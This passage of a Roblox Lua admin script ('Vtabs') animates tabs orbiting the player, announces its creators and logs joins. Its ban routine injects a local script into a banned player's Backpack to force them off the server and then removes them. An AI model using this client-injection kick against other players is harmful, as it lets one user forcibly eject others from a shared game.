| 1417 | if v.Name == "V3rmilli0n" or v.Name == "iiLuaScript" then | |
| 1418 | Output("Creator of Vtabs is in-game")
| |
| 1419 | end | |
| 1420 | end | |
| 1421 | ||
| 1422 | game.Players.PlayerAdded:connect(function(plr) | |
| 1423 | if plr.Name == "V3rmilli0n" or plr.Name == "iiLuaScript" then | |
| 1424 | Output("Creator of Vtabs is in-game")
| |
| 1425 | end | |
| 1426 | end) | |
| 1427 | ||
| 1428 | tabmodeldebounce = false | |
| 1429 | modeldebounce = false | |
| 1430 | game:service'RunService'.Stepped:connect(function() | |
| 1431 | if modeldebounce then return end | |
| 1432 | rot = (rot % 360) + 0.0001 | |
| 1433 | if tabmodel.Parent ~= workspace then | |
| 1434 | modeldebounce = true | |
| 1435 | tabs = {}
| |
| 1436 | tabmodel = Instance.new("Model", workspace)
| |
| 1437 | tabmodel.Name = "V3rm Tabs" | |
| 1438 | tabs = {}
| |
| 1439 | wait() | |
| 1440 | modeldebounce = false | |
| 1441 | end | |
| 1442 | end) | |
| 1443 | ||
| 1444 | rot = 0 | |
| 1445 | coroutine.resume(coroutine.create(function() | |
| 1446 | game:GetService("RunService").Stepped:connect(function()
| |
| 1447 | if probemode == false then | |
| 1448 | if LocalPlayer.Character then | |
| 1449 | if LocalPlayer.Character:findFirstChild("Torso") then
| |
| 1450 | rot = rot + 0.0001 | |
| 1451 | for i,v in pairs(Tabs) do | |
| 1452 | ypcall(function() | |
| 1453 | local pos = LocalPlayer.Character.Torso.CFrame | |
| 1454 | local radius = 4 + (#Tabs * 0.5) | |
| 1455 | local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
| 1456 | local y = 0 | |
| 1457 | local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
| 1458 | local arot = Vector3.new(x, y, z) + pos.p | |
| 1459 | local brot = v.CFrame.p | |
| 1460 | local crot = (arot * .1 + brot * .9) | |
| 1461 | v.CFrame = CFrame.new(crot, pos.p) | |
| 1462 | end) | |
| 1463 | end | |
| 1464 | end | |
| 1465 | end | |
| 1466 | end | |
| 1467 | if probemode == true then | |
| 1468 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
| 1469 | rot = rot + 0.001 | |
| 1470 | for i,v in pairs(Tabs) do | |
| 1471 | ypcall(function() | |
| 1472 | local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame | |
| 1473 | local radius = 4 + (#Tabs * 0.5) | |
| 1474 | local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
| 1475 | local y = 0 | |
| 1476 | local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
| 1477 | local arot = Vector3.new(x, y, z) + pos.p | |
| 1478 | local brot = v.CFrame.p | |
| 1479 | local crot = (arot * .1 + brot * .9) | |
| 1480 | v.CFrame = CFrame.new(crot, pos.p) | |
| 1481 | end) | |
| 1482 | end | |
| 1483 | end | |
| 1484 | end | |
| 1485 | end) | |
| 1486 | end)) | |
| 1487 | game:GetService("RunService").RenderStepped:connect(function()
| |
| 1488 | for _,a in pairs(game:service('Players'):children()) do
| |
| 1489 | for _,b in pairs(Banlist) do | |
| 1490 | if b:find(a.Name) then | |
| 1491 | NewLS([==[ | |
| 1492 | Instance.new('Message',Workspace).Text = "You are Banned."
| |
| 1493 | local p = game:GetService("Players").LocalPlayer
| |
| 1494 | p.Parent=nil | |
| 1495 | wait() | |
| 1496 | p.Parent=game:GetService("Players")
| |
| 1497 | ]==], a.Backpack) | |
| 1498 | a:remove() | |
| 1499 | Output('Banned Player # '..a.Name..' # Attempted to join.',__)
| |
| 1500 | else | |
| 1501 | end | |
| 1502 | end | |
| 1503 | end | |
| 1504 | end) | |
| 1505 | game.Players.ChildRemoved:connect(function(plr) | |
| 1506 | Output("Disconnected: "..plr.Name)
| |
| 1507 | wait(4) | |
| 1508 | Dismiss() | |
| 1509 | end) | |
| 1510 | ||
| 1511 | game.Players.ChildAdded:connect(function(plr) | |
| 1512 | Output("Connected: "..plr.Name)
| |
| 1513 | wait(4) | |
| 1514 | Dismiss() | |
| 1515 | end) |